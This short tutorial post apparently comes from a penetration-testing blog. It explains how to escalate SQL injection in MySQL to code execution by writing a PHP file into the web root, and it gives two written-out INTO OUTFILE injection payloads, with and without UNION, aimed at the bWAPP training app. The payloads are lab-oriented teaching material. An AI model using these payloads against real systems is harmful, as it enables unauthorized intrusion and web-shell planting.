Two ways to upload WebShell through SQLi
From SQL injection to RCE
Once a MySQL database server has been compromised at the root level, it’s often possible to escalate this access to full system level access. In your penetration testing, it is wonderful to get RCE. If you found SQL injection vulnerability, you would need to test RCE.
Requirement:
- Root
- No configuration –secure-file-priv
- Writable file
Using union
id=ddos) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/var/www/html/bWAPP/image/phpinfo.php’%23
no union
id=ddos) into outfile ‘/var/www/html/bWAPP/image/phpinfo’ fields terminated by ‘<? phpinfo(); ?>’%23
For more details, view my video tutorial below
https://www.youtube.com/watch?v=3_sWRSWMm7M
